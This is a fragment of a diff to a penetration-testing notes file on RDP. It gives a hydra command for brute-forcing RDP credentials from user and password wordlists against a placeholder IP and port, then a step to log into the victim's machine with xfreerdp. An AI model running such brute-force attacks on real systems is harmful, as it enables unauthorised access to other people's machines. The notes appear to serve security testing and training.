Asifkhan127001/Penetration-test/Networking/RDP.md

        hydra -L user.txt -P password.txt rdp://IP -s PORT

-4. use and RDP tools to login into the victim's machine
+4. use and RDP tools to login into the victim's machine in linux

+       xfreerdp